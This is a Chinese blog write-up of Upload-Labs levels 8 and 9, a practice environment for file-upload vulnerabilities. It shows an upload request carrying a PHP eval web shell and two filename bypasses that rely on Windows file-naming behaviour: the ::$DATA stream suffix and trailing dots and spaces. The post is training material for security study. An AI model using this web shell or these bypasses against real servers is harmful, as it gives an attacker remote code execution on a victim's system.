上传漏洞 Upload-Labs-8-9 实战笔记

凡艰辛的路,当由勇敢者以坚硬的脚底踏开。

黑盒测试

Lab 8

  1. 尝试之前的大小写发现没法绕过
  2. 尝试上传htaccess禁止上传
  3. 尝试后缀修改空格加点没法上传
  4. 尝试pphphp上传后,没法执行的

代码层可能绕不过去了,试一试系统层的,后缀空格加点号没办法上传,试一试把文件名改成.php::$DATA

Content-Disposition: form-data; name="upload_file"; filename="m.php::$DATA"
Content-Type: application/octet-stream

<?php @eval($_GET['x']);?>

然后就上传成功了….原理是win的文件命名规则绕过….

Lab 9

试了之前的套路都没能上传,继续利用win下的文件流特性绕过,上传

m.php. . . . . . . . 

上传成功….

白盒测试

Lab 8

与前面的文章一样,只是没有过滤::$DATA

Lab 9

虽然代码中将后缀的部分做了处理,但是明显处理不全面,只是删除了最后的空格和点号,这个时候多加几个空格和点号就可以上传了…

坚持原创技术分享,您的支持将鼓励我继续创作!
------ 本文结束 ------

版权声明

LangZi_Blog's by Jy Xie is licensed under a Creative Commons BY-NC-ND 4.0 International License
由浪子LangZi创作并维护的Langzi_Blog's博客采用创作共用保留署名-非商业-禁止演绎4.0国际许可证
本文首发于Langzi_Blog's 博客( http://langzi.fun ),版权所有,侵权必究。

0%